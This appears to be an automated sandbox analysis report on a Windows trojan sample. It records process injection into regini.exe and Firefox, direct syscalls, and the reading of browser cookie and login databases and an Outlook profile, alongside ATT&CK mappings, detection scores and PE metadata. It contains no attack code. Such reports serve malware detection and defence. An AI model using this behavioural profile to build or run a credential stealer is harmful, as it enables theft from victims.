                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtQueryAttributesFile: Direct from: 0x76EF2E6C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtQuerySystemInformation: Direct from: 0x76EF48CC
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtOpenSection: Direct from: 0x76EF2E0C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtQueryInformationToken: Direct from: 0x76EF2CAC
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtCreateFile: Direct from: 0x76EF2FEC
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtOpenFile: Direct from: 0x76EF2DCC
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtTerminateThread: Direct from: 0x76EF2FCC
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtOpenKeyEx: Direct from: 0x76EF2B9C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtSetInformationProcess: Direct from: 0x76EF2C5C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtNotifyChangeKey: Direct from: 0x76EF3C2C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtCreateMutant: Direct from: 0x76EF35CC
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtResumeThread: Direct from: 0x76EF36AC
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtMapViewOfSection: Direct from: 0x76EF2D1C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtClose: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtQuerySystemInformation: Direct from: 0x76EF2DFC
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtReadFile: Direct from: 0x76EF2ADC
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtDelayExecution: Direct from: 0x76EF2DDC
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtQueryInformationProcess: Direct from: 0x76EF2C26
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtResumeThread: Direct from: 0x76EF2FBC
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtCreateUserProcess: Direct from: 0x76EF371C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtWriteVirtualMemory: Direct from: 0x76EF490C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtSetInformationThread: Direct from: 0x76EE63F9
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtSetInformationThread: Direct from: 0x76EF2B4C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtReadVirtualMemory: Direct from: 0x76EF2E8C
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtCreateKey: Direct from: 0x76EF2C6C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Memory written: C:\Users\user\Desktop\BcF3o0Egke.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: NULL target: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Section loaded: NULL target: C:\Windows\SysWOW64\regini.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: NULL target: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe protection: read write
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: NULL target: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\regini.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\regini.exe Thread register set: target process: 5564
                Source: C:\Windows\SysWOW64\regini.exe Thread APC queued: target process: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Process created: C:\Users\user\Desktop\BcF3o0Egke.exe "C:\Users\user\Desktop\BcF3o0Egke.exe"
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Process created: C:\Users\user\Desktop\BcF3o0Egke.exe "C:\Users\user\Desktop\BcF3o0Egke.exe"
                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe Process created: C:\Windows\SysWOW64\regini.exe "C:\Windows\SysWOW64\regini.exe"
                Source: C:\Windows\SysWOW64\regini.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: ysdBLufRFxAq.exe, 00000006.00000002.3935537287.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000000.2366311176.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000000.2523244598.0000000000F21000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
                Source: ysdBLufRFxAq.exe, 00000006.00000002.3935537287.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000000.2366311176.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000000.2523244598.0000000000F21000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: ysdBLufRFxAq.exe, 00000006.00000002.3935537287.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000000.2366311176.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000000.2523244598.0000000000F21000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: ysdBLufRFxAq.exe, 00000006.00000002.3935537287.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000006.00000000.2366311176.00000000019B1000.00000002.00000001.00040000.00000000.sdmp, ysdBLufRFxAq.exe, 00000009.00000000.2523244598.0000000000F21000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeQueries volume information: C:\Users\user\Desktop\BcF3o0Egke.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                Source: Yara match | File source: 5.2.BcF3o0Egke.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.BcF3o0Egke.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000009.00000002.3937654032.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3935912832.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3935958759.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2475970970.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3935959813.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2443326901.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                Source: C:\Windows\SysWOW64\regini.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Windows\SysWOW64\regini.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

                Remote Access Functionality

                Source: Yara match | File source: 5.2.BcF3o0Egke.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.BcF3o0Egke.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000009.00000002.3937654032.0000000004CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3935912832.00000000031B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3935958759.0000000003200000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000007.00000002.3934881125.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2441172068.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2475970970.0000000004A20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000006.00000002.3935959813.0000000003090000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.2443326901.0000000001970000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 412 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 121 Security Software Discovery | Remote Services | 1 Email Collection | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 Abuse Elevation Control Mechanism | 1 Disable or Modify Tools | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 1 Data from Local System | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 412 Process Injection | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 113 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                [Behavior graph: ID 1588352, sample BcF3o0Egke.exe, start date 11/01/2025, architecture WINDOWS, score 100. Process chain: BcF3o0Egke.exe (started) -> BcF3o0Egke.exe (started) -> ysdBLufRFxAq.exe (injected) -> regini.exe (started) -> ysdBLufRFxAq.exe (injected) and firefox.exe (started).]

                Source | Detection | Scanner | Label | Link
                BcF3o0Egke.exe | 71% | Virustotal | | Browse
                BcF3o0Egke.exe | 96% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
                BcF3o0Egke.exe | 100% | Avira | HEUR/AGEN.1306657 |
                BcF3o0Egke.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Joe Sandbox version: 42.0.0 Malachite
                Analysis ID: 1588352
                Start date and time: 2025-01-11 01:19:49 +01:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 9m 22s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Run name: Run with higher sleep bypass
                Number of analysed new started processes analysed: 9
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 2
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: BcF3o0Egke.exe (renamed because original name is a hash value)
                Original Sample Name: c050dff0d7a2ba85b874106f24dd24687525f4ef7fd20485d3fb5660564ba6b5.exe
                Detection: MAL
                Classification: mal100.troj.spyw.evad.winEXE@9/2@10/10
                EGA Information:
                • Successful, ratio: 75%
                HCA Information:
                • Successful, ratio: 91%
                • Number of executed functions: 94
                • Number of non-executed functions: 280
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 20.109.210.53
                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing behavior information.
                No simulations
                                                                  Process:C:\Users\user\Desktop\BcF3o0Egke.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1216
                                                                  Entropy (8bit):5.34331486778365
                                                                  Encrypted:false
                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                  Malicious:true
                                                                  Reputation:high, very likely benign file
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                  Process:C:\Windows\SysWOW64\regini.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                  Category:dropped
                                                                  Size (bytes):196608
                                                                  Entropy (8bit):1.121297215059106
                                                                  Encrypted:false
                                                                  SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                  MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                  SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                  SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                  SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                  Malicious:false
                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):6.956374941943306
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:BcF3o0Egke.exe
                                                                  File size:1'014'272 bytes
                                                                  MD5:a04f2271ad163c1098d3ca9c311b53d0
                                                                  SHA1:4c3b52a43f8a0d4e29ab25342bd6cb19d4eb8442
                                                                  SHA256:c050dff0d7a2ba85b874106f24dd24687525f4ef7fd20485d3fb5660564ba6b5
                                                                  SHA512:1d515c5431587b142b2b48e5924e25542b896105e1b22fea84f6f45634805c256685968d7e51a03d529abb4cf3e65828336299824747d2d87d6aced098f143c2
                                                                  SSDEEP:12288:tU4z9QFwj/TJtAVusYUdw0uYFj9v9UE04Ywrod63ip:tUIaUMUsYEu34roOip
                                                                  TLSH:6325C53D09BD22EB80A5C79DCBE89827F614A46FB150ADA494D647A53347F4B34C323E
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...*&................0..p............... ........@.. ....................................@................................
                                                                  Icon Hash:00928e8e8686b000
                                                                  Entrypoint:0x4f8e96
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0xB48F262A [Tue Dec 29 02:44:58 2065 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xf8e42 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xfa000 | 0x5c4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xfc000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xf75f4 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
